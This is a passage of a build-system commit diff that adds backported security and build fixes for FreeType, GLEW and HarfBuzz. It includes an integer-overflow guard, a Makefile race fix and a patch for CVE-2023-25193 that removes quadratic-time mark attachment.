++++ b/src/truetype/ttgxvar.c
+@@ -43,6 +43,7 @@
+ #include FT_INTERNAL_DEBUG_H
+ #include FT_CONFIG_CONFIG_H
+ #include FT_INTERNAL_STREAM_H
++#include <freetype/internal/ftcalc.h>
+ #include FT_INTERNAL_SFNT_H
+ #include FT_TRUETYPE_TAGS_H
+ #include FT_TRUETYPE_IDS_H
+@@ -1065,7 +1066,7 @@
+                 delta == 1 ? "" : "s",
+                 vertical ? "VVAR" : "HVAR" ));
+
+-    *avalue += delta;
++    *avalue = ADD_INT( *avalue, delta );
+
+   Exit:
+     return error;
+--
+2.17.1
diff --git a/meta/recipes-graphics/freetype/freetype_2.10.1.bb b/meta/recipes-graphics/freetype/freetype_2.10.1.bb
index 2d444bbf19..6af744b981 100644
--- a/meta/recipes-graphics/freetype/freetype_2.10.1.bb
+++ b/meta/recipes-graphics/freetype/freetype_2.10.1.bb
@@ -15,6 +15,10 @@ LIC_FILES_CHKSUM = "file://docs/LICENSE.TXT;md5=4af6221506f202774ef74f64932878a1
 SRC_URI = "${SAVANNAH_NONGNU_MIRROR}/${BPN}/${BP}.tar.xz \
            file://use-right-libtool.patch \
            file://0001-sfnt-Fix-heap-buffer-overflow-59308.patch \
+           file://CVE-2022-27404.patch \
+           file://CVE-2022-27405.patch \
+           file://CVE-2022-27406.patch \
+           file://CVE-2023-2004.patch \
           "
 SRC_URI[md5sum] = "bd42e75127f8431923679480efb5ba8f"
 SRC_URI[sha256sum] = "16dbfa488a21fe827dc27eaf708f42f7aa3bb997d745d31a19781628c36ba26f"
diff --git a/meta/recipes-graphics/glew/glew/0001-Fix-build-race-in-Makefile.patch b/meta/recipes-graphics/glew/glew/0001-Fix-build-race-in-Makefile.patch
new file mode 100644
index 0000000000..7edcfe8de8
--- /dev/null
+++ b/meta/recipes-graphics/glew/glew/0001-Fix-build-race-in-Makefile.patch
@@ -0,0 +1,56 @@
+Upstream-Status: Submitted [https://github.com/nigels-com/glew/pull/311]
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+
+From 0ce0a85597db48a2fca619bd95e34af091e54ae8 Mon Sep 17 00:00:00 2001
+From: Ross Burton <ross.burton@arm.com>
+Date: Thu, 22 Jul 2021 16:31:11 +0100
+Subject: [PATCH] Fix build race in Makefile
+
+The current rule for the binaries is:
+
+glew.bin: glew.lib bin bin/$(GLEWINFO.BIN) bin/$(VISUALINFO.BIN)
+
+In parallel builds, all of those targets happen at the same time. This
+means that 'bin' can happen *after* 'bin/$(GLEWINFO.BIN)', which is a
+problem as the 'bin' target's responsibility is to create the directory
+that the other target writes into.
+
+Solve this by not having a separate 'create directory' target which is
+fundamentally racy, and simply mkdir in each target which writes into it.
+---
+ Makefile | 9 ++++-----
+ 1 file changed, 4 insertions(+), 5 deletions(-)
+
+diff --git a/Makefile b/Makefile
+index d0e4614..04af44c 100644
+--- a/Makefile
++++ b/Makefile
+@@ -171,21 +171,20 @@ VISUALINFO.BIN.OBJ := $(VISUALINFO.BIN.OBJ:.c=.o)
+ # Don't build glewinfo or visualinfo for NaCL, yet.
+ 
+ ifneq ($(filter nacl%,$(SYSTEM)),)
+-glew.bin: glew.lib bin
++glew.bin: glew.lib
+ else
+-glew.bin: glew.lib bin bin/$(GLEWINFO.BIN) bin/$(VISUALINFO.BIN) 
++glew.bin: glew.lib bin/$(GLEWINFO.BIN) bin/$(VISUALINFO.BIN)
+ endif
+ 
+-bin:
+-	mkdir bin
+-
+ bin/$(GLEWINFO.BIN): $(GLEWINFO.BIN.OBJ) $(LIB.SHARED.DIR)/$(LIB.SHARED)
++	@mkdir -p $(dir $@)
+ 	$(CC) $(CFLAGS) -o $@ $(GLEWINFO.BIN.OBJ) $(BIN.LIBS)
+ ifneq ($(STRIP),)
+ 	$(STRIP) -x $@
+ endif
+ 
+ bin/$(VISUALINFO.BIN): $(VISUALINFO.BIN.OBJ) $(LIB.SHARED.DIR)/$(LIB.SHARED)
++	@mkdir -p $(dir $@)
+ 	$(CC) $(CFLAGS) -o $@ $(VISUALINFO.BIN.OBJ) $(BIN.LIBS)
+ ifneq ($(STRIP),)
+ 	$(STRIP) -x $@
+-- 
+2.25.1
+
diff --git a/meta/recipes-graphics/glew/glew/notempdir.patch b/meta/recipes-graphics/glew/glew/notempdir.patch
new file mode 100644
index 0000000000..8d79ce0cdf
--- /dev/null
+++ b/meta/recipes-graphics/glew/glew/notempdir.patch
@@ -0,0 +1,19 @@
+We don't use the dist-* targets and hence DIST_DIR isn't used. The current code
+creates a new temp directory in /tmp/ for every invocation of make. Lets
+not do that.
+
+Upstream-Status: Pending [a revised version would be needed for upstream]
+Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
+
+Index: glew-2.2.0/Makefile
+===================================================================
+--- glew-2.2.0.orig/Makefile
++++ glew-2.2.0/Makefile
+@@ -56,7 +56,6 @@ DIST_SRC_ZIP ?= $(shell pwd)/$(DIST_NAME
+ DIST_SRC_TGZ ?= $(shell pwd)/$(DIST_NAME).tgz
+ DIST_WIN32   ?= $(shell pwd)/$(DIST_NAME)-win32.zip
+ 
+-DIST_DIR := $(shell mktemp -d /tmp/glew.XXXXXX)/$(DIST_NAME)
+ 
+ # To disable stripping of linked binaries either:
+ #   - use STRIP= on gmake command-line
diff --git a/meta/recipes-graphics/glew/glew_2.2.0.bb b/meta/recipes-graphics/glew/glew_2.2.0.bb
index 8948444e08..d7a26a3438 100644
--- a/meta/recipes-graphics/glew/glew_2.2.0.bb
+++ b/meta/recipes-graphics/glew/glew_2.2.0.bb
@@ -6,6 +6,8 @@ LICENSE = "MIT"
 LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=2ac251558de685c6b9478d89be3149c2"
 
 SRC_URI = "${SOURCEFORGE_MIRROR}/project/glew/glew/${PV}/glew-${PV}.tgz \
+           file://0001-Fix-build-race-in-Makefile.patch \
+           file://notempdir.patch \
            file://no-strip.patch"
 
 SRC_URI[md5sum] = "3579164bccaef09e36c0af7f4fd5c7c7"
diff --git a/meta/recipes-graphics/harfbuzz/harfbuzz/CVE-2023-25193-pre0.patch b/meta/recipes-graphics/harfbuzz/harfbuzz/CVE-2023-25193-pre0.patch
new file mode 100644
index 0000000000..90d4cfefb4
--- /dev/null
+++ b/meta/recipes-graphics/harfbuzz/harfbuzz/CVE-2023-25193-pre0.patch
@@ -0,0 +1,335 @@
+From 3122c2cdc45a964efedad8953a2df67205c3e3a8 Mon Sep 17 00:00:00 2001
+From: Behdad Esfahbod <behdad@behdad.org>
+Date: Sat, 4 Dec 2021 19:50:33 -0800
+Subject: [PATCH] [buffer] Add HB_GLYPH_FLAG_UNSAFE_TO_CONCAT
+
+Fixes https://github.com/harfbuzz/harfbuzz/issues/1463
+Upstream-Status: Backport from [https://github.com/harfbuzz/harfbuzz/commit/3122c2cdc45a964efedad8953a2df67205c3e3a8]
+Comment1: To backport the fix for CVE-2023-25193, add defination for HB_GLYPH_FLAG_UNSAFE_TO_CONCAT. This patch is needed along with CVE-2023-25193-pre1.patch for sucessfull porting.
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ src/hb-buffer.cc             | 10 ++---
+ src/hb-buffer.h              | 76 ++++++++++++++++++++++++++++++------
+ src/hb-buffer.hh             | 33 ++++++++++------
+ src/hb-ot-layout-gsubgpos.hh | 39 +++++++++++++++---
+ src/hb-ot-shape.cc           |  8 +---
+ 5 files changed, 124 insertions(+), 42 deletions(-)
+
+diff --git a/src/hb-buffer.cc b/src/hb-buffer.cc
+index 6131c86..bba5eae 100644
+--- a/src/hb-buffer.cc
++++ b/src/hb-buffer.cc
+@@ -610,14 +610,14 @@ done:
+ }
+ 
+ void
+-hb_buffer_t::unsafe_to_break_impl (unsigned int start, unsigned int end)
++hb_buffer_t::unsafe_to_break_impl (unsigned int start, unsigned int end, hb_mask_t mask)
+ {
+   unsigned int cluster = (unsigned int) -1;
+   cluster = _unsafe_to_break_find_min_cluster (info, start, end, cluster);
+-  _unsafe_to_break_set_mask (info, start, end, cluster);
++  _unsafe_to_break_set_mask (info, start, end, cluster, mask);
+ }
+ void
+-hb_buffer_t::unsafe_to_break_from_outbuffer (unsigned int start, unsigned int end)
++hb_buffer_t::unsafe_to_break_from_outbuffer (unsigned int start, unsigned int end, hb_mask_t mask)
+ {
+   if (!have_output)
+   {
+@@ -631,8 +631,8 @@ hb_buffer_t::unsafe_to_break_from_outbuffer (unsigned int start, unsigned int en
+   unsigned int cluster = (unsigned int) -1;
+   cluster = _unsafe_to_break_find_min_cluster (out_info, start, out_len, cluster);
+   cluster = _unsafe_to_break_find_min_cluster (info, idx, end, cluster);
+-  _unsafe_to_break_set_mask (out_info, start, out_len, cluster);
+-  _unsafe_to_break_set_mask (info, idx, end, cluster);
++  _unsafe_to_break_set_mask (out_info, start, out_len, cluster, mask);
++  _unsafe_to_break_set_mask (info, idx, end, cluster, mask);
+ }
+ 
+ void
+diff --git a/src/hb-buffer.h b/src/hb-buffer.h
+index d5cb746..42dc92a 100644
+--- a/src/hb-buffer.h
++++ b/src/hb-buffer.h
+@@ -77,26 +77,76 @@ typedef struct hb_glyph_info_t
+  * @HB_GLYPH_FLAG_UNSAFE_TO_BREAK: Indicates that if input text is broken at the
+  * 				   beginning of the cluster this glyph is part of,
+  * 				   then both sides need to be re-shaped, as the
+- * 				   result might be different.  On the flip side,
+- * 				   it means that when this flag is not present,
+- * 				   then it's safe to break the glyph-run at the
+- * 				   beginning of this cluster, and the two sides
+- * 				   represent the exact same result one would get
+- * 				   if breaking input text at the beginning of
+- * 				   this cluster and shaping the two sides
+- * 				   separately.  This can be used to optimize
+- * 				   paragraph layout, by avoiding re-shaping
+- * 				   of each line after line-breaking, or limiting
+- * 				   the reshaping to a small piece around the
+- * 				   breaking point only.
++ * 				   result might be different.
++ *
++ * 				   On the flip side, it means that when this
++ * 				   flag is not present, then it is safe to break
++ * 				   the glyph-run at the beginning of this
++ * 				   cluster, and the two sides will represent the
++ * 				   exact same result one would get if breaking
++ * 				   input text at the beginning of this cluster
++ * 				   and shaping the two sides separately.
++ *
++ * 				   This can be used to optimize paragraph
++ * 				   layout, by avoiding re-shaping of each line
++ * 				   after line-breaking.
++ *
++ * @HB_GLYPH_FLAG_UNSAFE_TO_CONCAT: Indicates that if input text is changed on one
++ * 				   side of the beginning of the cluster this glyph
++ * 				   is part of, then the shaping results for the
++ * 				   other side might change.
++ *
++ * 				   Note that the absence of this flag will NOT by
++ * 				   itself mean that it IS safe to concat text.
++ * 				   Only two pieces of text both of which clear of
++ * 				   this flag can be concatenated safely.
++ *
++ * 				   This can be used to optimize paragraph
++ * 				   layout, by avoiding re-shaping of each line
++ * 				   after line-breaking, by limiting the
++ * 				   reshaping to a small piece around the
++ * 				   breaking positin only, even if the breaking
++ * 				   position carries the
++ * 				   #HB_GLYPH_FLAG_UNSAFE_TO_BREAK or when
++ * 				   hyphenation or other text transformation
++ * 				   happens at line-break position, in the following
++ * 				   way:
++ *
++ * 				   1. Iterate back from the line-break position till
++ * 				   the the first cluster start position that is
++ * 				   NOT unsafe-to-concat, 2. shape the segment from
++ * 				   there till the end of line, 3. check whether the
++ * 				   resulting glyph-run also is clear of the
++ * 				   unsafe-to-concat at its start-of-text position;
++ * 				   if it is, just splice it into place and the line
++ * 				   is shaped; If not, move on to a position further
++ * 				   back that is clear of unsafe-to-concat and retry
++ * 				   from there, and repeat.
++ *
++ * 				   At the start of next line a similar algorithm can
++ * 				   be implemented. A slight complication will arise,
++ * 				   because while our buffer API has a way to
++ * 				   return flags for position corresponding to
++ * 				   start-of-text, there is currently no position
++ * 				   corresponding to end-of-text.  This limitation
++ * 				   can be alleviated by shaping more text than needed
++ * 				   and looking for unsafe-to-concat flag within text
++ * 				   clusters.
++ *
++ * 				   The #HB_GLYPH_FLAG_UNSAFE_TO_BREAK flag will
++ * 				   always imply this flag.
++ *
++ * 				   Since: REPLACEME
++ *
+  * @HB_GLYPH_FLAG_DEFINED: All the currently defined flags.
+  *
+  * Since: 1.5.0
+  */
+ typedef enum { /*< flags >*/
+   HB_GLYPH_FLAG_UNSAFE_TO_BREAK		= 0x00000001,
++  HB_GLYPH_FLAG_UNSAFE_TO_CONCAT	= 0x00000002,
+ 
+-  HB_GLYPH_FLAG_DEFINED			= 0x00000001 /* OR of all defined flags */
++  HB_GLYPH_FLAG_DEFINED			= 0x00000003 /* OR of all defined flags */
+ } hb_glyph_flags_t;
+ 
+ HB_EXTERN hb_glyph_flags_t
+diff --git a/src/hb-buffer.hh b/src/hb-buffer.hh
+index b5596d9..beac7b6 100644
+--- a/src/hb-buffer.hh
++++ b/src/hb-buffer.hh
+@@ -67,8 +67,8 @@ enum hb_buffer_scratch_flags_t {
+   HB_BUFFER_SCRATCH_FLAG_HAS_DEFAULT_IGNORABLES		= 0x00000002u,
+   HB_BUFFER_SCRATCH_FLAG_HAS_SPACE_FALLBACK		= 0x00000004u,
+   HB_BUFFER_SCRATCH_FLAG_HAS_GPOS_ATTACHMENT		= 0x00000008u,
+-  HB_BUFFER_SCRATCH_FLAG_HAS_UNSAFE_TO_BREAK		= 0x00000010u,
+-  HB_BUFFER_SCRATCH_FLAG_HAS_CGJ			= 0x00000020u,
++  HB_BUFFER_SCRATCH_FLAG_HAS_CGJ			= 0x00000010u,
++  HB_BUFFER_SCRATCH_FLAG_HAS_GLYPH_FLAGS		= 0x00000020u,
+ 
+   /* Reserved for complex shapers' internal use. */
+   HB_BUFFER_SCRATCH_FLAG_COMPLEX0			= 0x01000000u,
+@@ -324,8 +324,19 @@ struct hb_buffer_t
+       return;
+     unsafe_to_break_impl (start, end);
+   }
+-  HB_INTERNAL void unsafe_to_break_impl (unsigned int start, unsigned int end);
+-  HB_INTERNAL void unsafe_to_break_from_outbuffer (unsigned int start, unsigned int end);
++  void unsafe_to_concat (unsigned int start,
++			 unsigned int end)
++  {
++    if (end - start < 2)
++      return;
++    unsafe_to_break_impl (start, end, HB_GLYPH_FLAG_UNSAFE_TO_CONCAT);
++  }
++  HB_INTERNAL void unsafe_to_break_impl (unsigned int start, unsigned int end,
++					 hb_mask_t mask = HB_GLYPH_FLAG_UNSAFE_TO_BREAK | HB_GLYPH_FLAG_UNSAFE_TO_CONCAT);
++  HB_INTERNAL void unsafe_to_break_from_outbuffer (unsigned int start, unsigned int end,
++						   hb_mask_t mask = HB_GLYPH_FLAG_UNSAFE_TO_BREAK | HB_GLYPH_FLAG_UNSAFE_TO_CONCAT);
++  void unsafe_to_concat_from_outbuffer (unsigned int start, unsigned int end)
++  { unsafe_to_break_from_outbuffer (start, end, HB_GLYPH_FLAG_UNSAFE_TO_CONCAT); }
+ 
+ 
+   /* Internal methods */
+@@ -377,12 +388,7 @@ struct hb_buffer_t
+   set_cluster (hb_glyph_info_t &inf, unsigned int cluster, unsigned int mask = 0)
+   {
+     if (inf.cluster != cluster)
+-    {
+-      if (mask & HB_GLYPH_FLAG_UNSAFE_TO_BREAK)
+-	inf.mask |= HB_GLYPH_FLAG_UNSAFE_TO_BREAK;
+-      else
+-	inf.mask &= ~HB_GLYPH_FLAG_UNSAFE_TO_BREAK;
+-    }
++      inf.mask = (inf.mask & ~HB_GLYPH_FLAG_DEFINED) | (mask & HB_GLYPH_FLAG_DEFINED);
+     inf.cluster = cluster;
+   }
+ 
+@@ -398,13 +404,14 @@ struct hb_buffer_t
+   void
+   _unsafe_to_break_set_mask (hb_glyph_info_t *infos,
+ 			     unsigned int start, unsigned int end,
+-			     unsigned int cluster)
++			     unsigned int cluster,
++			     hb_mask_t mask)
+   {
+     for (unsigned int i = start; i < end; i++)
+       if (cluster != infos[i].cluster)
+       {
+-	scratch_flags |= HB_BUFFER_SCRATCH_FLAG_HAS_UNSAFE_TO_BREAK;
+-	infos[i].mask |= HB_GLYPH_FLAG_UNSAFE_TO_BREAK;
++	scratch_flags |= HB_BUFFER_SCRATCH_FLAG_HAS_GLYPH_FLAGS;
++	infos[i].mask |= mask;
+       }
+   }
+ 
+diff --git a/src/hb-ot-layout-gsubgpos.hh b/src/hb-ot-layout-gsubgpos.hh
+index 579d178..a6ca456 100644
+--- a/src/hb-ot-layout-gsubgpos.hh
++++ b/src/hb-ot-layout-gsubgpos.hh
+@@ -369,7 +369,7 @@ struct hb_ot_apply_context_t :
+     may_skip (const hb_glyph_info_t &info) const
+     { return matcher.may_skip (c, info); }
+ 
+-    bool next ()
++    bool next (unsigned *unsafe_to = nullptr)
+     {
+       assert (num_items > 0);
+       while (idx + num_items < end)
+@@ -392,11 +392,17 @@ struct hb_ot_apply_context_t :
+ 	}
+ 
+ 	if (skip == matcher_t::SKIP_NO)
++	{
++	  if (unsafe_to)
++	    *unsafe_to = idx + 1;
+ 	  return false;
++	}
+       }
++      if (unsafe_to)
++        *unsafe_to = end;
+       return false;
+     }
+-    bool prev ()
++    bool prev (unsigned *unsafe_from = nullptr)
+     {
+       assert (num_items > 0);
+       while (idx > num_items - 1)
+@@ -419,8 +425,14 @@ struct hb_ot_apply_context_t :
+ 	}
+ 
+ 	if (skip == matcher_t::SKIP_NO)
++	{
++	  if (unsafe_from)
++	    *unsafe_from = hb_max (1u, idx) - 1u;
+ 	  return false;
++	}
+       }
++      if (unsafe_from)
++        *unsafe_from = 0;
+       return false;
+     }
+ 
+@@ -834,7 +846,12 @@ static inline bool match_input (hb_ot_apply_context_t *c,
+   match_positions[0] = buffer->idx;
+   for (unsigned int i = 1; i < count; i++)
+   {
+-    if (!skippy_iter.next ()) return_trace (false);
++    unsigned unsafe_to;
++    if (!skippy_iter.next (&unsafe_to))
++    {
++      c->buffer->unsafe_to_concat (c->buffer->idx, unsafe_to);
++      return_trace (false);
++    }
+ 
+     match_positions[i] = skippy_iter.idx;
+ 
+@@ -1022,8 +1039,14 @@ static inline bool match_backtrack (hb_ot_apply_context_t *c,
+   skippy_iter.set_match_func (match_func, match_data, backtrack);
+ 
+   for (unsigned int i = 0; i < count; i++)
+-    if (!skippy_iter.prev ())
++  {
++    unsigned unsafe_from;
++    if (!skippy_iter.prev (&unsafe_from))
++    {
++      c->buffer->unsafe_to_concat_from_outbuffer (unsafe_from, c->buffer->idx);
+       return_trace (false);
++    }
++  }
+ 
+   *match_start = skippy_iter.idx;
+ 
+@@ -1045,8 +1068,14 @@ static inline bool match_lookahead (hb_ot_apply_context_t *c,
+   skippy_iter.set_match_func (match_func, match_data, lookahead);
+ 
+   for (unsigned int i = 0; i < count; i++)
+-    if (!skippy_iter.next ())
++  {
++    unsigned unsafe_to;
++    if (!skippy_iter.next (&unsafe_to))
++    {
++      c->buffer->unsafe_to_concat (c->buffer->idx + offset, unsafe_to);
+       return_trace (false);
++    }
++  }
+ 
+   *end_index = skippy_iter.idx + 1;
+ 
+diff --git a/src/hb-ot-shape.cc b/src/hb-ot-shape.cc
+index 5d9a70c..5d10b30 100644
+--- a/src/hb-ot-shape.cc
++++ b/src/hb-ot-shape.cc
+@@ -1008,7 +1008,7 @@ hb_propagate_flags (hb_buffer_t *buffer)
+   /* Propagate cluster-level glyph flags to be the same on all cluster glyphs.
+    * Simplifies using them. */
+ 
+-  if (!(buffer->scratch_flags & HB_BUFFER_SCRATCH_FLAG_HAS_UNSAFE_TO_BREAK))
++  if (!(buffer->scratch_flags & HB_BUFFER_SCRATCH_FLAG_HAS_GLYPH_FLAGS))
+     return;
+ 
+   hb_glyph_info_t *info = buffer->info;
+@@ -1017,11 +1017,7 @@ hb_propagate_flags (hb_buffer_t *buffer)
+   {
+     unsigned int mask = 0;
+     for (unsigned int i = start; i < end; i++)
+-      if (info[i].mask & HB_GLYPH_FLAG_UNSAFE_TO_BREAK)
+-      {
+-	 mask = HB_GLYPH_FLAG_UNSAFE_TO_BREAK;
+-	 break;
+-      }
++      mask |= info[i].mask & HB_GLYPH_FLAG_DEFINED;
+     if (mask)
+       for (unsigned int i = start; i < end; i++)
+ 	info[i].mask |= mask;
+-- 
+2.25.1
+
diff --git a/meta/recipes-graphics/harfbuzz/harfbuzz/CVE-2023-25193-pre1.patch b/meta/recipes-graphics/harfbuzz/harfbuzz/CVE-2023-25193-pre1.patch
new file mode 100644
index 0000000000..4994e0ef68
--- /dev/null
+++ b/meta/recipes-graphics/harfbuzz/harfbuzz/CVE-2023-25193-pre1.patch
@@ -0,0 +1,135 @@
+From b29fbd16fa82b82bdf0dcb2f13a63f7dc23cf324 Mon Sep 17 00:00:00 2001
+From: Behdad Esfahbod <behdad@behdad.org>
+Date: Mon, 6 Feb 2023 13:08:52 -0700
+Subject: [PATCH] [gsubgpos] Refactor skippy_iter.match()
+
+Upstream-Status: Backport from [https://github.com/harfbuzz/harfbuzz/commit/b29fbd16fa82b82bdf0dcb2f13a63f7dc23cf324]
+Comment1: To backport the fix for CVE-2023-25193, add defination for MATCH, NOT_MATCH and SKIP.
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ src/hb-ot-layout-gsubgpos.hh | 94 +++++++++++++++++++++---------------
+ 1 file changed, 54 insertions(+), 40 deletions(-)
+
+diff --git a/src/hb-ot-layout-gsubgpos.hh b/src/hb-ot-layout-gsubgpos.hh
+index a6ca456..5a7e564 100644
+--- a/src/hb-ot-layout-gsubgpos.hh
++++ b/src/hb-ot-layout-gsubgpos.hh
+@@ -369,33 +369,52 @@ struct hb_ot_apply_context_t :
+     may_skip (const hb_glyph_info_t &info) const
+     { return matcher.may_skip (c, info); }
+ 
++    enum match_t {
++      MATCH,
++      NOT_MATCH,
++      SKIP
++    };
++
++    match_t match (hb_glyph_info_t &info)
++    {
++      matcher_t::may_skip_t skip = matcher.may_skip (c, info);
++      if (unlikely (skip == matcher_t::SKIP_YES))
++	return SKIP;
++
++      matcher_t::may_match_t match = matcher.may_match (info, match_glyph_data);
++      if (match == matcher_t::MATCH_YES ||
++	  (match == matcher_t::MATCH_MAYBE &&
++	   skip == matcher_t::SKIP_NO))
++	return MATCH;
++
++      if (skip == matcher_t::SKIP_NO)
++        return NOT_MATCH;
++
++      return SKIP;
++  }
++
+     bool next (unsigned *unsafe_to = nullptr)
+     {
+       assert (num_items > 0);
+       while (idx + num_items < end)
+       {
+ 	idx++;
+-	const hb_glyph_info_t &info = c->buffer->info[idx];
+-
+-	matcher_t::may_skip_t skip = matcher.may_skip (c, info);
+-	if (unlikely (skip == matcher_t::SKIP_YES))
+-	  continue;
+-
+-	matcher_t::may_match_t match = matcher.may_match (info, match_glyph_data);
+-	if (match == matcher_t::MATCH_YES ||
+-	    (match == matcher_t::MATCH_MAYBE &&
+-	     skip == matcher_t::SKIP_NO))
+-	{
+-	  num_items--;
+-	  if (match_glyph_data) match_glyph_data++;
+-	  return true;
+-	}
+-
+-	if (skip == matcher_t::SKIP_NO)
++	switch (match (c->buffer->info[idx]))
+ 	{
+-	  if (unsafe_to)
+-	    *unsafe_to = idx + 1;
+-	  return false;
++	  case MATCH:
++	  {
++	    num_items--;
++	    if (match_glyph_data) match_glyph_data++;
++	    return true;
++	  }
++	  case NOT_MATCH:
++	  {
++	    if (unsafe_to)
++	      *unsafe_to = idx + 1;
++	    return false;
++	  }
++	  case SKIP:
++	    continue;
+ 	}
+       }
+       if (unsafe_to)
+@@ -408,27 +427,22 @@ struct hb_ot_apply_context_t :
+       while (idx > num_items - 1)
+       {
+ 	idx--;
+-	const hb_glyph_info_t &info = c->buffer->out_info[idx];
+-
+-	matcher_t::may_skip_t skip = matcher.may_skip (c, info);
+-	if (unlikely (skip == matcher_t::SKIP_YES))
+-	  continue;
+-
+-	matcher_t::may_match_t match = matcher.may_match (info, match_glyph_data);
+-	if (match == matcher_t::MATCH_YES ||
+-	    (match == matcher_t::MATCH_MAYBE &&
+-	     skip == matcher_t::SKIP_NO))
++	switch (match (c->buffer->out_info[idx]))
+ 	{
+-	  num_items--;
+-	  if (match_glyph_data) match_glyph_data++;
+-	  return true;
+-	}
+-
+-	if (skip == matcher_t::SKIP_NO)
+-	{
+-	  if (unsafe_from)
+-	    *unsafe_from = hb_max (1u, idx) - 1u;
+-	  return false;
++	  case MATCH:
++	  {
++	    num_items--;
++	    if (match_glyph_data) match_glyph_data++;
++	    return true;
++	  }
++	  case NOT_MATCH:
++	  {
++	    if (unsafe_from)
++	      *unsafe_from = hb_max (1u, idx) - 1u;
++	    return false;
++	  }
++	  case SKIP:
++	    continue;
+ 	}
+       }
+       if (unsafe_from)
+-- 
+2.25.1
+
diff --git a/meta/recipes-graphics/harfbuzz/harfbuzz/CVE-2023-25193.patch b/meta/recipes-graphics/harfbuzz/harfbuzz/CVE-2023-25193.patch
new file mode 100644
index 0000000000..e4ac13dbad
--- /dev/null
+++ b/meta/recipes-graphics/harfbuzz/harfbuzz/CVE-2023-25193.patch
@@ -0,0 +1,179 @@
+From 9c8e972dbecda93546038d24444d8216397d75a3 Mon Sep 17 00:00:00 2001
+From: Behdad Esfahbod <behdad@behdad.org>
+Date: Mon, 6 Feb 2023 14:51:25 -0700
+Subject: [PATCH] [GPOS] Avoid O(n^2) behavior in mark-attachment
+
+Upstream-Status: Backport from [https://github.com/harfbuzz/harfbuzz/commit/8708b9e081192786c027bb7f5f23d76dbe5c19e8]
+Comment1: The Original Patch [https://github.com/harfbuzz/harfbuzz/commit/85be877925ddbf34f74a1229f3ca1716bb6170dc] causes regression and was reverted. This Patch completes the fix.
+Comment2: The Patch contained files MarkBasePosFormat1.hh and MarkLigPosFormat1.hh which were moved from hb-ot-layout-gpos-table.hh as per https://github.com/harfbuzz/harfbuzz/commit/197d9a5c994eb41c8c89b7b958b26b1eacfeeb00
+CVE: CVE-2023-25193
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+Signed-off-by: Dhairya Nagodra <dnagodra@cisco.com>
+
+---
+ src/hb-ot-layout-gpos-table.hh | 103 +++++++++++++++++++++++----------
+ src/hb-ot-layout-gsubgpos.hh   |   5 +-
+ 2 files changed, 78 insertions(+), 30 deletions(-)
+
+diff --git a/src/hb-ot-layout-gpos-table.hh b/src/hb-ot-layout-gpos-table.hh
+index 024312d..db5f9ae 100644
+--- a/src/hb-ot-layout-gpos-table.hh
++++ b/src/hb-ot-layout-gpos-table.hh
+@@ -1458,6 +1458,25 @@ struct MarkBasePosFormat1
+ 
+   const Coverage &get_coverage () const { return this+markCoverage; }
+ 
++  static inline bool accept (hb_buffer_t *buffer, unsigned idx)
++  {
++    /* We only want to attach to the first of a MultipleSubst sequence.
++     * https://github.com/harfbuzz/harfbuzz/issues/740
++     * Reject others...
++     * ...but stop if we find a mark in the MultipleSubst sequence:
++     * https://github.com/harfbuzz/harfbuzz/issues/1020 */
++    return !_hb_glyph_info_multiplied (&buffer->info[idx]) ||
++          0 == _hb_glyph_info_get_lig_comp (&buffer->info[idx]) ||
++          (idx == 0 ||
++           _hb_glyph_info_is_mark (&buffer->info[idx - 1]) ||
++           !_hb_glyph_info_multiplied (&buffer->info[idx - 1]) ||
++           _hb_glyph_info_get_lig_id (&buffer->info[idx]) !=
++           _hb_glyph_info_get_lig_id (&buffer->info[idx - 1]) ||
++           _hb_glyph_info_get_lig_comp (&buffer->info[idx]) !=
++           _hb_glyph_info_get_lig_comp (&buffer->info[idx - 1]) + 1
++           );
++  }
++
+   bool apply (hb_ot_apply_context_t *c) const
+   {
+     TRACE_APPLY (this);
+@@ -1465,37 +1484,46 @@ struct MarkBasePosFormat1
+     unsigned int mark_index = (this+markCoverage).get_coverage  (buffer->cur().codepoint);
+     if (likely (mark_index == NOT_COVERED)) return_trace (false);
+ 
+-    /* Now we search backwards for a non-mark glyph */
++    /* Now we search backwards for a non-mark glyph.
++     * We don't use skippy_iter.prev() to avoid O(n^2) behavior. */
++
+     hb_ot_apply_context_t::skipping_iterator_t &skippy_iter = c->iter_input;
+-    skippy_iter.reset (buffer->idx, 1);
+     skippy_iter.set_lookup_props (LookupFlag::IgnoreMarks);
+-    do {
+-      if (!skippy_iter.prev ()) return_trace (false);
+-      /* We only want to attach to the first of a MultipleSubst sequence.
+-       * https://github.com/harfbuzz/harfbuzz/issues/740
+-       * Reject others...
+-       * ...but stop if we find a mark in the MultipleSubst sequence:
+-       * https://github.com/harfbuzz/harfbuzz/issues/1020 */
+-      if (!_hb_glyph_info_multiplied (&buffer->info[skippy_iter.idx]) ||
+-	  0 == _hb_glyph_info_get_lig_comp (&buffer->info[skippy_iter.idx]) ||
+-	  (skippy_iter.idx == 0 ||
+-	   _hb_glyph_info_is_mark (&buffer->info[skippy_iter.idx - 1]) ||
+-	   _hb_glyph_info_get_lig_id (&buffer->info[skippy_iter.idx]) !=
+-	   _hb_glyph_info_get_lig_id (&buffer->info[skippy_iter.idx - 1]) ||
+-	   _hb_glyph_info_get_lig_comp (&buffer->info[skippy_iter.idx]) !=
+-	   _hb_glyph_info_get_lig_comp (&buffer->info[skippy_iter.idx - 1]) + 1
+-	   ))
+-	break;
+-      skippy_iter.reject ();
+-    } while (true);
++    unsigned j;
++    for (j = buffer->idx; j > c->last_base_until; j--)
++    {
++      auto match = skippy_iter.match (buffer->info[j - 1]);
++      if (match == skippy_iter.MATCH)
++      {
++       if (!accept (buffer, j - 1))
++         match = skippy_iter.SKIP;
++      }
++      if (match == skippy_iter.MATCH)
++      {
++       c->last_base = (signed) j - 1;
++       break;
++      }
++    }
++    c->last_base_until = buffer->idx;
++    if (c->last_base == -1)
++    {
++      buffer->unsafe_to_concat_from_outbuffer (0, buffer->idx + 1);
++      return_trace (false);
++    }
++
++    unsigned idx = (unsigned) c->last_base;
+ 
+     /* Checking that matched glyph is actually a base glyph by GDEF is too strong; disabled */
+-    //if (!_hb_glyph_info_is_base_glyph (&buffer->info[skippy_iter.idx])) { return_trace (false); }
++    //if (!_hb_glyph_info_is_base_glyph (&buffer->info[idx])) { return_trace (false); }
+ 
